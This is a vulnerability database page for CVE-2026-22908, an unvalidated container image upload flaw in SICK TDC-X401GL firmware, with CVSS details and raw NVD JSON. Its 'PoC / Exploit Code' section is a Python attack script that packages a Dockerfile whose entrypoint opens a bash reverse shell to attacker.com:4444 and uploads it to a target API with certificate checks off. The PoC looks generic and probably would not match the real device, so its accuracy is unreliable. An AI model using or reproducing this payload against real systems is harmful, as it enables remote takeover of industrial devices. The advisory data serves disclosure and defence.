Security Vulnerability Report
中文
CVE-2026-22908 CVSS 9.1 CRITICAL

CVE-2026-22908

Published: 2026-01-15 13:16:05
Last Modified: 2026-01-23 15:46:56
Source: [email protected]

Description

Uploading unvalidated container images may allow remote attackers to gain full access to the system, potentially compromising its integrity and confidentiality.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK产品受影响版本(具体版本需参考官方通告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-22908 PoC - Malicious Container Image Upload # This PoC demonstrates the vulnerability of uploading unvalidated container images import requests import tarfile import io TARGET_URL = "https://target-system.com/api/container/upload" ATTACKER_IP = "attacker.com" ATTACKER_PORT = "4444" def create_malicious_image(): """Create a malicious container image with reverse shell payload""" # Create a minimal Dockerfile with reverse shell dockerfile_content = f''' FROM alpine:latest RUN apk add --no-cache bash nc curl RUN echo "#!/bin/bash" > /entrypoint.sh RUN echo "bash -i >& /dev/tcp/{ATTACKER_IP}/{ATTACKER_PORT} 0>&1" >> /entrypoint.sh RUN chmod +x /entrypoint.sh ENTRYPOINT ["/entrypoint.sh"] ''' # Create tar archive for container image image_tar = io.BytesIO() with tarfile.open(fileobj=image_tar, mode='w') as tar: # Add malicious Dockerfile info = tarfile.TarInfo(name="Dockerfile") info.size = len(dockerfile_content.encode()) tar.addfile(info, io.BytesIO(dockerfile_content.encode())) return image_tar.getvalue() def exploit(): """Upload malicious container image to exploit CVE-2026-22908""" malicious_image = create_malicious_image() headers = { 'Authorization': 'Bearer <valid_token>', 'X-Image-Name': 'malicious-image:latest' } # Note: No validation is performed on the uploaded image response = requests.post( TARGET_URL, files={'image': ('malicious.tar', malicious_image, 'application/x-tar')}, headers=headers, verify=False ) return response.status_code, response.text if __name__ == "__main__": print("[*] Exploiting CVE-2026-22908: Unvalidated Container Image Upload") status, resp = exploit() print(f"[*] Response Status: {status}") print(f"[*] Response: {resp}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22908", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:05.400", "lastModified": "2026-01-23T15:46:56.290", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uploading unvalidated container images may allow remote attackers to gain full access to the system, potentially compromising its integrity and confidentiality."}, {"lang": "es", "value": "Subir imágenes de contenedores no validadas puede permitir a atacantes remotos obtener acceso total al sistema, comprometiendo potencialmente su integridad y confidencialidad."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.4.0", "matchCriteriaId": "B95FBF38-3829-4FC4-BBFD-137B810FAA5A"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.